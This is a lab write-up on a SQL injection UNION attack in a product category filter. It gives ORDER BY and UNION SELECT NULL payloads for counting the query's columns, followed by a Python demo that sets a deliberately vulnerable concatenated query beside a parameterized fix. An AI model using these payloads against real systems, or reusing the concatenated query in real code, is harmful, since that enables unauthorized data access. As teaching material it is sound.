INFO LAB :

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.


GOAL : → To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.


Solution :

First, we need to find out how many columns the query in this lab returns.

We have seen this technique in previous labs.

' ORDER BY 1--              200 ok
' ORDER BY 2--              200 ok 
' ORDER BY 3--              200 ok 
' ORDER BY 4--              500 internal server error

OK, now we know the query returns just 3 columns.

Let's use NULL values to make the query return an additional row:

' UNION SELECT NULL,NULL,NULL--


🎉 Congrats! You’ve solved the lab! 🎉
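
Why the responses above look the way they do, and what changes once the category is bound as a parameter, shown as an added example that is not part of the original writeup or the lab's code. It assumes a hypothetical three-column `products` table in in-memory SQLite with constructed rows; the function names are illustrative and the lab's real schema and database engine are not known from this page.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the lab's product table (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT, category TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, "Mug", "Gifts"), (2, "Card", "Gifts"), (3, "Lamp", "Home")])
    return db

def filter_vulnerable(db, category):
    # The category is concatenated into the SQL text, so a quote inside it
    # closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT id, name, category FROM products "
           "WHERE category = '" + category + "'")
    return db.execute(sql).fetchall()

def filter_parameterized(db, category):
    # The category is bound as data and cannot change the statement's shape.
    sql = "SELECT id, name, category FROM products WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()

def probe(fn, db, value):
    # Mirrors what the writeup observes: rows back -> "200", SQL error -> "500".
    try:
        return ("200", fn(db, value))
    except sqlite3.Error as exc:
        return ("500", str(exc))

def run_demo():
    db = make_db()
    inputs = ["' ORDER BY 3--", "' ORDER BY 4--",
              "' UNION SELECT NULL,NULL,NULL--"]
    # For each input: (vulnerable result, parameterized result).
    return {v: (probe(filter_vulnerable, db, v),
                probe(filter_parameterized, db, v)) for v in inputs}

if __name__ == "__main__":
    for value, (weak, fixed) in run_demo().items():
        print(f"{value!r}\n  concatenated: {weak}\n  parameterized: {fixed}")
```

In the concatenated version the error on `ORDER BY 4` and the all-NULL row both come from the database parsing the input as SQL; with the bound parameter every input is just a category name that matches nothing.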